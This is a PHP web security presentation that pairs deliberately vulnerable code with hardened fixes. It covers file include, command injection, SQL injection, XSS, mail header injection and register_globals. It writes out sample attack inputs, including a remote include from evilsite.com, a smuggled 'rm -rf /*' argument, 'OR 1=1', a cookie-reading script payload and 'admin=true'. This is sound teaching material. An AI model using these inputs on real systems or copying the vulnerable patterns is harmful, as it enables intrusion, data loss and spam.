1 PHP and Web Application Security
An overview of various attacks that can affect web based applications (focusing on PHP) and how to counteract them
Dominic Cleal

2 Areas to be covered
● Filename/include validation
● Unvalidated exec calls
● SQL injection
● Cross-site scripting attacks (XSS)
● Mail injection
● register_globals
● Cookies and session data
● Built-in security features
● Suhosin/Hardened-PHP
● Month of bugs

3 Filename/include validation
● Often occurs when reading in page names from the URL and trying to load them
● Example attacks:
  – index.php?page=/etc/passwd
  – index.php?page=http://evilsite.com/script.txt
● Can be stopped by requiring that the supplied page name is within a defined list
● Disabling allow_url_fopen blocks the remote include, but is not a complete fix on its own (local files such as /etc/passwd can still be included)

4 Filename/include validation

    <?php
    include('header.php');
    include($_GET['page']); // unvalidated input used
    include('footer.php');
    ?>

    <?php
    $validate = array('about.php', 'contact.php', 'products.php');
    // requires that the input is present and is one of the allowed values
    if (!isset($_GET['page']) || !in_array($_GET['page'], $validate, true))
        die('Invalid page specified');
    include('header.php');
    include($_GET['page']);
    include('footer.php');
    ?>

Demos: default, remote, daemon
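A stricter form of the allow-list above, added here as an example and not taken from the slides: the request supplies only a short key, and the filename comes from a fixed map, so no part of the input is ever used as a path. The page keys, filenames and the pages/ directory are assumptions chosen for illustration.

```php
<?php
// Added example (not from the slides): an allow-list that maps a short page
// key to a fixed filename, so nothing from the request ever becomes a path.
// The keys, filenames and the pages/ directory are assumptions.
$pages = array(
    'about'    => 'about.php',
    'contact'  => 'contact.php',
    'products' => 'products.php',
);

// Returns the filename to include, or null if the request is not allowed.
function resolvePage(array $allowed, $requested)
{
    // A missing or non-string parameter (e.g. page[]=x) is rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: no type juggling, no substring matching, so
    // "../", "/etc/passwd" or "http://..." can never match a key.
    return array_key_exists($requested, $allowed) ? $allowed[$requested] : null;
}

$file = resolvePage($pages, isset($_GET['page']) ? $_GET['page'] : 'about');
if ($file === null) {
    header('HTTP/1.1 404 Not Found');
    die('Invalid page specified');
}

include 'header.php';
include __DIR__ . '/pages/' . $file; // built only from constants and the map value
include 'footer.php';
```

Because the map value, not the request, is what reaches include(), the allow_url_fopen setting no longer matters for this script, and an unknown key produces a 404 rather than a PHP warning that reveals the filesystem layout.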

5 Unvalidated exec calls
● Very similar to the previous problem, except that this can give direct access to running commands on the system

    <?php
    system("cal {$_GET['month']} {$_GET['year']}"); // ^ completely unvalidated
    ?>

● What happens when the above is run with page.php?year=;rm -rf /* ?
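A hardened version of the calendar script, added as an example (not code from the slides): both parameters are validated as integers within a plausible range before any command is built, and escapeshellarg() is applied as defence in depth. The accepted year range and the 400 response are assumptions.

```php
<?php
// Added example (not from the slides): validate month and year as integers in
// range before they reach the shell, then quote each one with escapeshellarg().
// The ranges and the error response are assumptions for illustration.
function buildCalCommand($month, $year)
{
    $m = filter_var($month, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1, 'max_range' => 12)));
    $y = filter_var($year, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1970, 'max_range' => 2100)));
    if ($m === false || $y === false) {
        return null; // anything that is not a whole number in range is refused
    }
    // $m and $y are now plain ints; escapeshellarg() still wraps each in single
    // quotes so the shell sees exactly one argument per value, whatever the source.
    return 'cal ' . escapeshellarg((string) $m) . ' ' . escapeshellarg((string) $y);
}

$cmd = buildCalCommand(
    isset($_GET['month']) ? $_GET['month'] : '',
    isset($_GET['year']) ? $_GET['year'] : ''
);
if ($cmd === null) {
    header('HTTP/1.1 400 Bad Request');
    die('Invalid month or year');
}
// With year=";rm -rf /*" execution never reaches this line.
header('Content-Type: text/plain');
echo shell_exec($cmd);
```

Validation is the real control here; escapeshellarg() only guards against a future edit that loosens the integer check. Where the output can be produced in PHP itself (a calendar can be built with date functions), not shelling out at all removes the whole class of problem.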

6 SQL injection
● Common vulnerability, though often mitigated by PHP's built-in "magic quotes" feature

    <?php
    $qry = mysql_query("SELECT * FROM table " .
                       "WHERE field1 = {$_GET['field']}");
    ?>

● Now run this with: page.php?field=1 OR 1=1
(Demo link)

7 SQL injection
● Magic quotes sanitises all input to the page (in $_GET/$_POST/$_COOKIE) by escaping quotation characters to avoid common injection techniques
● It is controlled by magic_quotes_gpc (enabled by default)
● It only escapes quote characters, so it does nothing for an unquoted numeric value such as the field=1 OR 1=1 example on the previous slide
● Can cause problems when developers assume magic_quotes_gpc is enabled and the application is deployed to an unknown environment
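The lookup from slide 6 rewritten with a prepared statement, added here as an example that is not from the slides. It runs against an in-memory SQLite database through PDO so it is self-contained; the table, column names and sample rows are constructed for the demonstration, and the validation plus placeholder binding is what replaces any reliance on magic quotes.

```php
<?php
// Added example (not from the slides): the same query with a prepared
// statement, run against a constructed in-memory SQLite table via PDO.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE items (field1 INTEGER, name TEXT)');
$db->exec("INSERT INTO items VALUES (1, 'one'), (2, 'two'), (3, 'three')");

// Returns the matching rows for an id taken from the request, or null if the
// value is not an integer at all. The value is never spliced into SQL text.
function findByField(PDO $db, $field)
{
    $id = filter_var($field, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null; // "1 OR 1=1" fails validation before any query runs
    }
    $stmt = $db->prepare('SELECT field1, name FROM items WHERE field1 = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

var_dump(findByField($db, '2'));         // one row: field1 => 2, name => 'two'
var_dump(findByField($db, '1 OR 1=1'));  // null: rejected, not all three rows

// Even if the validation were skipped and the raw string bound as text, the
// placeholder carries data, not SQL: the comparison becomes
// field1 = '1 OR 1=1' and no OR clause is ever parsed. Magic quotes, by
// contrast, only escapes quote characters and leaves this unquoted numeric
// context completely unprotected.
```

The same pattern applies to mysqli or PDO against MySQL: prepare with placeholders, bind the value with its type, and never build the WHERE clause by string concatenation of request data.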

8 Cross-site scripting (XSS)
● Very easy to do accidentally – just by printing the supplied user input back to the browser
● Can lead to account hijacking via cookies, and arbitrary JavaScript execution under the trusted domain of the vulnerable site
● Use htmlentities() (HTML encoding) on all output back to the browser that could potentially contain unvalidated input

9 Cross-site scripting (XSS)

    <?php
    setcookie('sessionid', 'secretidnumber');
    print "Your name is {$_GET['name']}";
    ?>

Now consider clicking a link and accessing: page.php?name=<script>alert(document.cookie)</script>
(Reflected demo link, stored demo link)

10 Cross-site scripting (XSS)
● An alert box may look fairly harmless, but using simple JavaScript, cookie data could be sent to another web site via redirection for use with session hijacking
● Usually triggered by following a dangerous link from an external web site that sends you to the target web site
● URL obfuscation and encoding techniques can make it difficult to spot such dangerous links
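The page from slide 9 written so that the reflected value is encoded on output and the session cookie is out of reach of script, added here as an example and not code from the slides. The helper name, cookie value and the input field are assumptions; the HttpOnly flag is a standard PHP setcookie() parameter.

```php
<?php
// Added example (not from the slides): every request value passes through one
// escaping helper on its way into HTML, and the session cookie is marked
// HttpOnly so script running in the page cannot read document.cookie.
// The helper name, cookie value and form field are assumptions.
function h($s)
{
    // ENT_QUOTES also escapes single quotes, so the result is safe inside
    // attributes delimited with either quote style; a fixed UTF-8 charset
    // avoids encoding tricks that confuse the escaper and the browser.
    return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

// Parameters: name, value, expires, path, domain, secure, httponly.
// secure would be true on an HTTPS site; httponly keeps the id from script.
setcookie('sessionid', 'secretidnumber', 0, '/', '', false, true);

$name = isset($_GET['name']) ? $_GET['name'] : 'guest';

// With the payload from slide 9 the HTML source contains
// &lt;script&gt;alert(document.cookie)&lt;/script&gt;, which the browser
// renders as literal text and never executes.
echo '<p>Your name is ' . h($name) . "</p>\n";
echo '<input type="text" name="name" value="' . h($name) . '">' . "\n";
```

Encoding on output, at the point the value enters HTML, is what makes this robust: the same stored value may later be placed in an attribute, a text node or a JSON response, and each context needs its own encoder. HttpOnly limits the damage of a script that does slip through, but it is a second line, not a substitute for encoding.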

11 Mail injection
● Scripts using the mail() function can often be easily abused by attackers to send spam through the script and server
● New lines can be supplied in the parameters passed into mail() from the user input (say, the recipient, sender, subject line), allowing the attacker to create new headers and change the body
● This gives the ability to change the recipients and use the script for spamming

12 Mail injection

    <?php
    mail('webmaster@example.net', "Web message: {$_POST['subject']}", $_POST['body']);
    ?>

● Now supply the subject parameter with this: "Text%0ATo:user@example.net"
● This will cause the message to be sent to user@example.net as well as the original recipient
● Multiple headers (recipients, subject line) and even a new body can be prepended
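A check that stops the header injection from slides 11 and 12 before mail() is called, added here as an example (not the slides' code): any value destined for a header line is refused if it contains a carriage return, line feed or NUL, and the recipient is fixed in code rather than taken from the form. The function names and the sample subjects are constructed for the illustration.

```php
<?php
// Added example (not from the slides): reject any header value containing a
// line break before it reaches mail(), and keep the recipient out of user
// control. Function names and the sample strings are constructed here.
function isSafeHeaderValue($value)
{
    // CR or LF (raw, or the %0A / %0D from the slide once URL-decoded) would
    // start a new header line; NUL and non-string input are refused as well.
    return is_string($value) && preg_match('/[\r\n\0]/', $value) === 0;
}

function sendContactMessage($subject, $body)
{
    if (!isSafeHeaderValue($subject)) {
        return false; // "Text\nTo:user@example.net" stops here
    }
    // The recipient is a constant. The body is not a header, so newlines in it
    // are harmless, but the subject is one header line and must stay one.
    return mail('webmaster@example.net', 'Web message: ' . $subject, (string) $body);
}

// Constructed inputs showing what the check accepts and rejects.
var_dump(isSafeHeaderValue('Hello from the form'));        // true
var_dump(isSafeHeaderValue("Text\nTo:user@example.net"));  // false
var_dump(isSafeHeaderValue("Text\r\nBcc:a@example.net"));  // false
var_dump(isSafeHeaderValue(array('not', 'a', 'string')));  // false
```

If a user-supplied address really has to appear in a header (a Reply-To, for instance), validate it with filter_var($addr, FILTER_VALIDATE_EMAIL) in addition to the line-break check, since an address cannot legitimately contain a newline either.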

13 register_globals
● Yes, this old chestnut...
● Pre-PHP 4.2 issue, however the lesson learnt is still relevant for developers
● Any parameters supplied to the page would be saved into variables of the same name automatically
● e.g. page.php?var1=a&var2=b would create two variables, $var1 and $var2, initialised to 'a' and 'b' respectively

14 register_globals

    <?php
    if ($password == 'secret')
        $admin = true;
    /* ... */
    if ($admin) {
        // allow user full control
    }
    ?>

● Consider that $admin isn't initialised, so to gain admin access, you could access the page with: page.php?admin=true
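The same logic rewritten so that it is safe whether or not register_globals happens to be on, added as an example rather than code from the slides: every variable is initialised before use, input is read from $_POST explicitly, and the script refuses to run at all under register_globals. The literal password is a placeholder for a stored-hash check and the function name is an assumption.

```php
<?php
// Added example (not from the slides): initialise every variable, read input
// only from the superglobals, and refuse to run if register_globals is on.
// The literal 'secret' stands in for a stored-hash comparison.

// ini_get() returns false for a directive that no longer exists (PHP 5.4+),
// so this check is harmless on modern builds and a hard stop on old ones.
if (ini_get('register_globals')) {
    die('register_globals must be disabled');
}

$admin = false;   // initialised: ?admin=true can no longer pre-set it
$password = isset($_POST['password']) ? $_POST['password'] : '';

function isAdminPassword($supplied)
{
    // is_string() rejects arrays such as password[]=x; hash_equals() compares
    // in constant time so the length and prefix do not leak through timing.
    return is_string($supplied) && hash_equals('secret', $supplied);
}

if (isAdminPassword($password)) {
    $admin = true;
}

if ($admin) {
    // allow user full control
}
```

The habit that outlives register_globals itself is the first assignment: a flag that grants privilege is set to its denying value before any code path can read it, so a missing branch fails closed.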

15 Cookies and session data
● Cookies and their data are stored on the client system by its browser
● Session data is stored on the server, however a client side cookie is used to uniquely identify the client and access it
● Cookies are untrusted data: you do not know if the contents have been altered
● Sessions can be hijacked, however the data is only available to the server (and any other shared web sites)
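An example of keeping authenticated state on the server side as slide 15 describes, added here and not part of the presentation: the cookie carries only the session identifier, the identifier is regenerated when the user logs in, and the login decision comes from $_SESSION rather than anything the client sent. The user store, credentials and function names are constructed for the demonstration.

```php
<?php
// Added example (not from the slides): authenticated state lives in the
// server-side session; the cookie is only an identifier and is rotated on
// login. The user store and function names are constructed here.

// Cookie params: lifetime, path, domain, secure, httponly. secure would be
// true on an HTTPS site; httponly keeps the id away from injected script.
session_set_cookie_params(0, '/', '', false, true);
session_start();

// Constructed credential store: one user, hash computed at startup.
$users = array('alice' => password_hash('correct-horse', PASSWORD_DEFAULT));

function credentialsValid(array $users, $user, $pass)
{
    return is_string($user) && is_string($pass)
        && isset($users[$user]) && password_verify($pass, $users[$user]);
}

// Whether the request is authenticated is decided by server-side data only;
// a client can edit a cookie, but not $_SESSION.
function currentUser()
{
    return isset($_SESSION['user']) ? $_SESSION['user'] : null;
}

function login($username)
{
    // A fresh id on login defeats session fixation: an id planted in the
    // victim's browser before login no longer refers to any session.
    session_regenerate_id(true);
    $_SESSION['user'] = $username;
    $_SESSION['login_time'] = time();
}

function logout()
{
    $_SESSION = array();
    session_destroy();
}

if (isset($_POST['username'], $_POST['password'])
        && credentialsValid($users, $_POST['username'], $_POST['password'])) {
    login($_POST['username']);
}

echo currentUser() === null
    ? "Not logged in\n"
    : 'Logged in as ' . htmlspecialchars(currentUser(), ENT_QUOTES, 'UTF-8') . "\n";
```

Storing the username in $_SESSION instead of a cookie is the point of the slide: hijacking still requires stealing the identifier, but tampering with the stored data itself is not possible from the client.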

16 Built-in security features
● safe_mode – includes extra UID/GID checks when opening files, tries to restrict execution of binaries to particular directories (broken by design)
● open_basedir – limits file operations to a particular set of directories, also broken by design
● Security features are easily bypassed, but are worth enabling – better than nothing
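A php.ini fragment collecting the settings the presentation touches on (allow_url_fopen from slide 3, magic_quotes_gpc from slide 7, register_globals from slide 13, safe_mode and open_basedir from this slide), added as an example rather than a configuration the presentation supplies. The open_basedir paths are placeholders, and allow_url_include is a separate directive that exists from PHP 5.2 onwards.

```ini
; Added example (not from the slides); paths are placeholders.
allow_url_fopen = Off          ; no remote files via include()/fopen() (slide 3)
allow_url_include = Off        ; PHP 5.2+: remote include stays off even where
                               ; allow_url_fopen has to be On for other reasons
register_globals = Off         ; slides 13/14; the directive is gone in PHP 5.4+
magic_quotes_gpc = Off         ; do not rely on it: validate and parametrise in
                               ; code so the app behaves the same everywhere (slide 7)
open_basedir = /var/www/example:/tmp   ; confine file operations (slide 16)
safe_mode = On                 ; "better than nothing" on PHP < 5.4, where it exists
```

None of these replace the validation shown on the earlier slides; as the slide says, they are a backstop that raises the cost of a mistake rather than a guarantee.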

17 Suhosin/Hardened-PHP
● Patchset for PHP to increase security, mostly in the engine
● Suhosin supersedes Hardened-PHP
● Also allows you to disable eval() and PCRE's /e modifier
● Extra protection against remote include vulnerabilities and newline insertion into the mail() function
● Available in Debian Testing/Ubuntu Feisty as php5-suhosin

18 Month of bugs
● A Hardened-PHP project initiative
● Revealing at least one security flaw per day during March
● Highlighting issues in the Zend engine, PHP core and extensions, not applications
● Some have been addressed in 5.2.1 and 4.4.5, released on 14th February
● The PHP Security team doesn't recognise, or won't fix, some of the vulnerabilities

19 Questions?
● Useful links:
  – http://uk.php.net/features.safe-mode
  – http://www.php-security.org/
  – http://www.hardened-php.net/
  – http://en.wikipedia.org/wiki/XSS

